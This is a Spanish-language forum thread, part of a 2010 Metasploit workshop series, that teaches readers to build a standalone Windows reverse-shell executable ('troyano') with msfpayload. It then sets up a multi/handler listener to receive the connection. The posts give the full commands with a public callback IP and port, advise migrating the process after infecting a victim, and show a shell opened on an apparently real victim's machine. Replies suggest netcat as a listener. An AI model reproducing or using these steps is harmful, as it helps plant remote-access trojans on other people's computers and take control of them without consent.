• General

  • Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
 #210164  por shiva-sheva
 26 Jul 2010, 00:29
+Temario
-+¿Reverse Shell?
-+¿Payload binario(.EXE)?
-+Configurancion y compilacion
-+Estudiando la configuracion
-+¿Multi/handler?
-+Configuracion y "escuchando"
-+Conclusion
  • Bueno ya emos visto como backdorear un binario
    pero no emos visto como podemos hacer un payload
    binario y que quiero decir con esto? Me refiero a que
    no ejecute nada mas que nuestro payload.

+¿Reverse Shell?

  • Bueno repasemos como el nombre nos dice
    un reverse shell es una shell reversa y esto
    funciona asi en lugar de que nosotro busquemos
    la shell, la shell nos busca a nosotro como un "troyano"
    obvio al puro stylo de msf jejejejj XD !!

+¿Payload binario(.EXE)?

  • Bien asi como suena aremos nuestro payload binario
    esto quiere decir que sera un ejecutable que solo contendra
    nuestra payload selecionada previamente jejejje
    "Troyano al stylo msf"
+Configurancion y compilacion
  • Bueno vamos a poner un reverse tcp como payload y lo compilaremos
    poniendo nuestro puerto a usar y nuestra payload selecionada yo usare
    esta pero ustedes pueden usar cualquier otra les recuerdo el comando
    search en msf o show payloads ...

    vamos a la carpeta donde tenemos nuestro msf y tecleamos
Código: Seleccionar todo
[email protected]:~/metasploit$ sudo ./msfpayload windows/shell_reverse_tcp LHOST=187.152.162.199 LPORT=666 X > /home/shiva-sheva/pay.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 314
Options: LHOST=187.152.162.199,LPORT=666
[email protected]:~/metasploit$ 
+Estudiando la configuracion
  • sudo ./msfpayload: Llamamos a msfpayload con derechos sudo
    windows/shell_reverse_tcp: Ruta de nuestro payload
    LHOST=187.152.162.199: Nuestra ip
    LPORT=666: Puerto que usaremos
    X > /home/shiva-sheva/pay.exe: Indicamos que sera ejecutable y la ruta donde queremos guardarlo!
+¿Multi/handler?
  • Bueno handler lo podremos definir como un tipo de
    listener configurable a nuestro antojo para poder
    esuchar conexiones que nos quieran hacer es decir...
    Si enviamos nuestro payload binario a una victima podamos
    recibir la conexion de lo conotrario no se podra!!!

    IMPORTANTE:Cuando aya infectado a la victima recuerde usar migrate
    para poder migrar el proceso y nunca muero nuestra shell inversa o
    por lo menos que dure mas tiempo....
+Configuracion y "escuchando"
  • Bueno ahora lanzaremos el handler para poder escuchar la conexion
    y poder "interceptarla" vamos a la shell y escribimos...
Código: Seleccionar todo
[email protected]:~/metasploit$ sudo ./msfconsole
  • Llamamos a msfconsole
    dentro de ella damos
Código: Seleccionar todo
msf > use exploit/multi/handler
  • Ahora tenemos que indicar el payload que usamos!
Código: Seleccionar todo
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
  • Ok todo perfecto hasta ahora ahora vamos a ver las opciones que tenemos que configurar...
Código: Seleccionar todo
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port


Exploit target:

Id Name
-- ----
0 Wildcard Target
  • Indicamos LHOST que es nuestra ip e indicamos el LPORT que es el puerto
Código: Seleccionar todo
msf exploit(handler) > set LHOST 187.152.162.199
LHOST => 187.152.162.199
msf exploit(handler) > set LPORT 666
LPORT => 666
  • Podemos proceder a lanzarlo de esta forma!
Código: Seleccionar todo
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
  • Y si es que ya abrio nuestro troyano al stylo msf nos saldra esto
Código: Seleccionar todo
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (187.152.162.199:666 -> xxx.xx.xxx.243:1150)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\BY-K4RL\My Documents>
  • Bueno puse los xxx.xxx.xxx.xxx para proteger los datos del onweado jejejej
    y bueno asi se simple es el pentest ustedes saben si se la complican o no!

+Conclusion

  • Bueno vimos algo interesante esta vez ya sabes
    como hacer nuestro troyanos al mero estylo de msf
    jejeje y bueno esperen la parte VIII veremos algo
    muy importante para complementar esta parte!Saludos!
 #210185  por ProcessKill
 26 Jul 2010, 01:26
Muy bueno Shiva! Muchas gracias por esta parte del Taller
Voy a estar atento a los demas!
Saludos!
 #210568  por Slek
 26 Jul 2010, 18:55
Muy bueno, como siempre.

Para los usuarios de windows, pueden usar el netcat para escuchar la conexión. (Eso es lo que yo hacía xD)

Espero la parte 8!!

Saludos!